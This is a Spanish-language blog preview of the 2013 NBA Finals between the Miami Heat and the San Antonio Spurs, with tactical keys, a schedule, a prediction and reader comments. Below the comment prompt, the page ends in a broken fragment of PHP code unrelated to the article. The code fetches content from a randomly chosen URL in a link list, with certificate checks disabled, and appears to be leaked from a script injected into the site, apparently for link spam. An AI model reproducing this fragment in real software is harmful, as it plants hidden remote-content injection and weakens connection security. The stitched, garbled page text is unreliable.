Previa Finales 2013: Miami Heat – San Antonio Spurs

06 de June de 2013 por TheDeerHunter

Última previa de un año intenso. Llega el momento más esperado por todos, pero al mismo tiempo esto se acaba. Disfrutemos al máximo de lo que queda pues en pocos días comenzaremos a sufrir cuatro interminables meses de síndrome de abstinencia.

Las Finales se antojan apasionantes. Los campeones defienden el título con bastantes dudas, las que se han generado en una eliminatoria donde han sufrido hasta el límite y que pueden haberles desgastado más de la cuenta. Los aspirantes Spurs, en cambio, han dominado su conferencia con puño de hierro y mostrado un baloncesto sin apenas fisuras, sólo las que logró abrir el deslumbrante talento de un Stephen Curry medio lesionado. Y es que éste es otro de los grandes atractivos de esta final. Han sido unos Playoffs preciosos, pero han estado particularmente afectados por las lesiones. Heat y Spurs son los que han tenido más suerte en ese sentido y veremos un duelo con todas las armas en la palestra. Los texanos, adicionalmente, vienen bastante descansados… quizá hasta demasiado.

duncan jamesNo vamos a ver el inmejorable duelo individual entre los dos mejores del mundo como pudimos hacer el año pasado, pero sí entre dos pedazo de mitos entrando de lleno en el Olimpo del top 10 de todos los tiempos. Lo de King James es increíble pero queremos verle sudar y que se lo gane. El deseo de ver a Duncan culminar “a lo Jabbar” una temporada tan alucinante se suma al morbo de ver a los Beach Boys hincar la rodilla. Se palpa cierta simpatía por Pop y los suyos. Quién lo habría dicho hace unos años.

En condiciones normales pensamos que los Heat deben ser favoritos contra cualquiera. Falta por ver si son ésas condiciones pues llegan algo tocados. Los Spurs harían bien en mirarse en el espejo de Indiana para buscarles las cosquillas. Tienen muchas más armas ofensivas, como ha demostrado su plácido paseo ante la defensa más dura de la liga, pero son menos físicos que Pacers y, lo que puede ser más importante, con menor capacidad reboteadora. Defensivamente, a pesar de que en la regular Indiana se comportó de forma excelsa, en estos Playoffs los que mejor han defendido según los números han sido Spurs. Finalmente, por muy alta consideración que tenemos de Vogel, no es Popovich, que dudamos se le habría pasado por la cabeza sentar a Hibbert en aquella entrada ganadora de LeBron en la prórroga del primero en semis. El viejo zorro blanco es uno de los pocos entrenadores en activo capaz de cambiar el curso de una eliminatoria con su pizarra. Lo hemos visto unas cuantas veces. Hay que ver si Spoelstra está a la altura del reto.

Sólo puede quedar uno.

Claves de la eliminatoria:

El estado físico de Wade: Flash lo ha pasado francamente mal ante Indiana, aunque al final su fortaleza prevaleció. Veremos si el sobreesfuerzo pasa factura; si es así, no veo a Miami revalidando título.

La capacidad de Spurs de infligir daño interior: La dupla Hibbert-West fue un martillo pilón contra los intentos de small-ball de Miami en la serie anterior. Hay que ver cómo lo emulan Duncan-Splitter. Previsiblemente se tratará de colocar a LeBron sobre el brasileño y generar un desequilibrio en transición si éste no consigue imponerse en la zona rival. También hay que ver qué nivel despliega Bosh, porque Duncan a estas alturas va a ser implacable con él. En este mismo apartado los Spurs están obligados a dominar ampliamente los tableros si quieren tener alguna opción y aquí sí que no se pueden comparar con Indiana.

parker wade

Controlar a Parker: El rendimiento del francés ha impresionado ante Memphis. Jugando así es imparable. Spoelstra le desgastará con dos bases rápidos como Chalmers y Cole, colocando a LeBron (o Wade suponiéndolo sano) sobre él en finales apretados. Ahí podría morder hueso el extraordinario base.

La experiencia es un grado: Ni Ginóbili ni Ray Allen han estado particularmente finos esta postemporada, pero sabemos de qué son capaces sin encuentra el punto. Apostaría a que alguno de los partidos de la serie se resuelve por un arrebato de genialidad de uno de estos dos veteranos. Adicionalmente, tenemos ganas de ver alguno de los ases que a buen seguro tiene Popovich guardado en su manga.

El cum laude de Kawhi Leonard: Creo que nadie se plantea que LeBron no llegue a causar desequilibrios constantes frente a ningún rival habido o por haber, pero Popovich dispone de un especialista de élite para intentar minimizarle. 2º año en la liga y ya le ha tocado bailar a vida o muerte contra Durant el año pasado, y ahora contra LeBron. Eso es formarse. Además, los Spurs han probado en el pasado con Boris Diaw como alternativa más interior.

popovich spoelstraCalendario de las Finales:

Game 1: jueves 6, 3h00 @ Miami.
Game 2: domingo 9, 2h00 @ Miami.
Game 3: martes 11, 3h00 @ SA.
Game 4: jueves 13, 3h00 @ SA.
Game 5: domingo 16, 2h00 @ SA.
Game 6: martes 18, 3h00 @ Miami.
Game 7: jueves 20, 3h00 @ Miami.
(horarios para España)

Pronóstico: Spurs en 6.

Comenta

17 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Para mí el favorito es Miami claramente. Lo digo porque Indiana era un equipo con menos talento que Spurs pero con una zona mucho mejor. Por mucho que Duncan conserve todo su talento, si Miami se ha logrado imponer finalmente a Hibbert&West, no dudo que Duncan&Splitter también caerán. Spurs pasó la eliminatoria contra Memphis a base de triples en el primero y de picks&roll en los otros tres partidos. Sabemos que Parker es un gran genio, pero siempre sufre contra defensas que le hacen 2×1. No digo ayudas de mierder, como le pasó a Marc, que llegaba tarde, Duncan ya se le había ido y Parker hacía media hora que había estudiado el pase, digo los 2×1 que hacen los chavales de Miami, que son presiones durísimas como hemos visto contra Pacers. A ese nivel defensivo, San Antonio no tiene nada que hacer.

    Y sí, el estado físico de Wade es la principal incógnita. De él dependen los Heat, porque ya sabemos que James va a estar, pero MIami necesita a Wade en estos partidos al mismo nivel que su último juego contra Pacers. Excelente análisis Deer

      Citar

  2. Sancho88 dice:
    #2

    Por cierto, menudo genio el Richard Starwrick este, me recuerda a Suso 33 en España

      Citar

  3. MagicJohnson32 dice:
    #3

    Sancho88:
    Para mí el favorito es Miami claramente. Lo digo porque Indiana era un equipo con menos talento que Spurs pero con una zona mucho mejor. Por mucho que Duncan conserve todo su talento, si Miami se ha logrado imponer finalmente a Hibbert&West, no dudo que Duncan&Splitter también caerán. Spurs pasó la eliminatoria contra Memphis a base de triples en el primero y de picks&roll en los otros tres partidos. Sabemos que Parker es un gran genio, pero siempre sufre contra defensas que le hacen 2×1. No digo ayudas de mierder, como le pasó a Marc, que llegaba tarde, Duncan ya se le había ido y Parker hacía media hora que había estudiado el pase, digo los 2×1 que hacen los chavales de Miami, que son presiones durísimas como hemos visto contra Pacers. A ese nivel defensivo, San Antonio no tiene nada que hacer.

    No sé, Sancho. Si algo tienen los Spurs es un juego de pases maravilloso, rotación de balón sin bote hasta encontrar el tiro fácil (generalmente, desde la esquina). Eso es indefendible, y más cuando tienes un poste que pasa muy bien (Duncan) y gente que en cualquier momento puede romper hacia el aro como TP, Manu o Leonard.

    Sí que está claro que los Spurs no pueden imponerse en la pintura de la manera que lograban los Pacers, pero Popovich puede convertir eso en una ventaja. Tiene cartas para ello, por ejemplo probar minutos de small ball (Parker, Manu, Green, Leonard, Duncan), algo que además daría al equipo más velocidad para la transición defensiva.

    Dado que los partidos de regular entre ambos no fueron nada indicativos, tengo ganas de ver el 1º de la serie, a ver por dónde van los tiros.

      Citar

  4. Simon dice:
    #4

    Yo una vez llegados aqui creo que Miami va a ganar. Veia con más opciones a Indiana que a Spurs. San Antonio es mejor equipo que Indiana todos los días que salga el sol pero físicamente no hay color a favor de Pacers y creo que la superioridad física que no pudieron imponer siempre ante Indiana, será el punto clave para la victoria de Miami.

      Citar

  5. Laker1624 dice:
    #5

    Buenas,

    Para mi es favorito Miami, sobretodo por el estado físico de ambas plantillas. Pero no tengo nada claro que Miami consiga anular a Parker tan fácilmente. Me parece haber escuchado que Parker aun no esta del todo fino físicamente, y creo que esto es lo único que puede hacer que no rinda a su nivel en esta eliminatoria. Splitter no es santo de mi devoción en lo que respecta su carrera en la NBA, pero creo que junto a Duncan van a dominar los tableros. Aunque los Spurs no tengan un juego interior tan potente como Indiana, sigo creyendo que son superiores a los Heat en la pintura. Además veo a San Antonio con muchas más alternativas ofensivas que los Pacers, sobretodo en el perímetro. Pienso que Duncan aumentara sus prestaciones y que Parker como mínimo mantendrá el nivel exhibido hasta ahora, y tengo dudas sobre la mejoría de Ginóbili de cara a estas finales.

    Lo que en mi opinión será fundamental por parte de los Heat es la recuperación de Wade, creo que es lo que mas les puede condicionar. Tengo la sensación de que Wade no mejorara mucho en comparación a la serie frente a los Pacers. Para mi Wade, siempre y cuando este al 100%, es el único jugador de los Heat junto a LeBron que le puede garantizar al equipo cierta regularidad anotadora durante una serie de PO. Es posible que Allen ofrezca alguna gran actuación en más de un partido, que ya me parece bastante, pero no lo veo haciendo mucho más. En cuanto a Bosh, si es defendido por Duncan, creo que tendrá que alejarse mucho del aro para hacer daño. Creo que Andersen y Haslem serán muy importantes y tendrán que dejarse la piel en la pintura.

      Citar

  6. HisRoyalAirness dice:
    #6

    Gran análisis Deer.

    Sancho, pues yo no veo a la pintura de Pacers superior a los Spurs eh? Más física y voluminosa, sí, pero la inteligencia y, como dice Magic, el pase de Duncan creo que la hacen mucho más versátil. Y tiradores tienen bastantes.

    Los ajustes sobre la marcha van a ser claves porque, aunque suene a tópico, son equipos con estilos muy diferentes y pueden crear desajustes con cada cambio de emparejamiento o sustitución. Y aquí Pop no tiene rival (a lo mejor lo tiene pero no va a estar enfrente, al menos no en el banquillo).

    Me encantaría que los arbitrajes fuesen lo menos caseros posibles, sé que es una quimera pero me rebienta mucho cuando los partidos se condicionan por eso. Espero que cada penetración a canasta no sean tiros libres en Miami

      Citar

  7. HisRoyalAirness dice:
    #7

    Los Nuggets han despedido a Karl. Hay que ser inútil.
    Clippers frotándose las manos ante la oportunidad

      Citar

  8. jose_dantley dice:
    #8

    Gran análisis. No lo tengo nada claro. Me gusta San Antonio, pero intuyo que Miami es algo favorito. No tanto como 70/30 que parece que es por donde van las apuestas, pero favorito.

    A ver el tema físico. Los días de descanso obviamente han jugado a favor de los Spurs

      Citar

  9. rumbero dice:
    #9

    Pues yo soy de los que no ve tan favorito a Miami como parece.
    A mi es que me han gustado mucho los Spurs estos PO. Excelente defensa y variantes segun el rival y muchos recursos en ataque moviendo mucho y bien el balón. Parece difícil que les pillen pájaras de anotación como Pacers cuando Miami saque su mejor versión defensiva… Y a ese big three perenne con Pop al mando (que algo tendrá guardado) se les han unido Leonard y Green que pueden tener mucho que decir.
    Vaya que se lo va a tener que currar Miami. Son mejores fisicamente pero vienen de una serie dura y con Wade y Bosh tocados. Flash va a tener que estar toda la serie y no 2 partidos. Y los otros defender mucho, correr más y meter las que tengan. El resto es cosa de Lebron, que con un poco de ayuda es capaz de marcar el sino de las finales él solito. Hoy empezamos a salir de dudas
    Gran análisis por cierto!

      Citar

  10. Sempren dice:
    #10

    Para mí sí está claro que los Pacers tienen un juego interior más potente que los Spurs: el problema es el nivel del acompañante de Duncan. Si Splitter se pareciese algo al jugador de Europa, si al menos sacase una cantidad de rebotes aceptable para un tío de su talla, esta diferencia se quedaría en muy poca.
    Pero por fuera… el tiro exterior que no tiene Parker se lo pueden quedar los dos aleros, sean Green, Leonard, Ginobili o incluso Neal, Leonard va a aportar mucha defensa, y Green más de lo mismo, pero poniéndole más tiro exterior que Stephenson. Y si entramos en el banquillo, Pop tiene armas.

    Estoy seguro que la puntuación global de las finales será muy pareja, aunque acaben 4-2 para cualquiera de los dos equipos. No sabría decir quién es el favorito, y eso es muy bueno para los aficionados al basket.

      Citar

  11. Ruxixón dice:
    #11

    Que jodida maravilla de promo,ya podían aquí darle un poco de mimo a las retransmisiones de la Liga Endesa.

    Let’s Go Heat! Apuesto Miami en 6

      Citar

  12. GreenPride dice:
    #12

    Gran análisis. Llegan las Finales, hora de separar hombres de niños… y en estas series no hay niños. Con esto quiero decir que no hay equipos sin experiencia y que este año no espero desapariciones estilo Harden del año pasado.
    Está claro que las opciones de los Spurs pasan por marcar el ritmo haciendo daño desde dentro para aprovechar su gran juego exterior. Sus armas ofensivas son mucho mejores que las de los Pacers y aunque no ganarán el rebote tan claramente pueden castigar cada fallo defensivo o cada exceso de celo interior de los Heat de manera salvaje.
    La clave para los Heat será intentar parar ese famoso juego de pase que empieza con pick&roll Parker-Ginobilli&Duncan para desde ahí crear. Parker debe crear innumerables problemas tanto a Chalmers como a Cole por lo que si Flash está bien físicamente espero verle en defensa de Parker muchas veces en los segundos tiempos. Para mí esta puede ser la clave el rendimiento de Wade tanto en ataque como en defensa. Si Wade está mal le castigaran y LeBron le va a necesitar para igualar las anotaciones que no podían conseguir los Pacers pero sí los Spurs.
    Al otro lado, Duncan debe dominar y sacar de los partidos a Bosh como lo ha hecho Hibbert. Es el último gran baile para TD y va a poner todo en el asador. Bosh tras una serie lamentable ante Indiana tiene su oportunidad de redención ante un juego interior algo menos físico… no apuesto por ello de todas maneras.
    Y la batalla de los secundarios podría ser decisiva. En principio los Spurs tienen clara ventaja con Leonard, Green,Splitter, Bonner, Diaw, Neal y compañía dispuestos a sumar mucho más que los erráticos Cole, Allen y cía (Andersen a parte que este ha estado realmente muy bien. El Rey necesitará esta vez toda la ayuda así que alguno de estos deberá echar una mano en cada partido para poder ganar.
    Y por último LeBron. Asentado como mejor jugador se encuentra ante el reto de repetir anillo ante un equipo-equipo. Veremos como lo hace. Espero grandes actuaciones suyas a pesar de las constantes trampas que le tienda el “zorro plateado” Popovich.
    Si del baúl de Pops sale alguna argucia que les dé un partido de los 2 primeros veo a San Antonio campeón. Esta vez voy a apostar por la sorpresa y voy a decir que Spurs se corona en 6 ante la impotencia de un LeBron abandonado por Wade&Bosh. Apasionantes finales (por favor que no haya lesiones….)

      Citar

  13. rumbero dice:
    #13

    La leche, que partidazo y que canastita de Parker para matarlo.
    Si juegan así 7 que gane el que quiera.

      Citar

  14. Denise dice:
    #14

    Pfffff, la canasta de Parker, canasta del año, a lo mejor hay pasos, pero da igual. Lebron siendo posterizado en su intento de tapón pero mas no ha podido hacer el hombre.

      Citar

  15. jose_dantley dice:
    #15

    Tiene pinta de haber sido un partidazo, nadie cogía diferencias.

    La canastita final del Sr. Parker tremenda. Agotar los 24 segundos y meterla así debe ser para el rival una puñalada.

      Citar

  16. kantonyo dice:
    #16

    No he visto el partido, pero como es posible que San Antonio tenga peor porcentaje en tiros de 2, en tiros 3d, haya cogido muchísimos menos rebotes, prácticamente hayan tenido las mismas perdidas… Y se han llevado el partido!!!! ¿Cómo se come todo esto?

    San Antonio Spurs INTANGIBLES KINGS

      Citar

  17. AntoniAngel dice:
    #17

    Felicidades, Deer, un anàlisis collonut.
    SAS en 6… ya lo firmo. Duncan y Parker se lo merecen.
    Es año impáar…
    Ya están aquíiiii…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>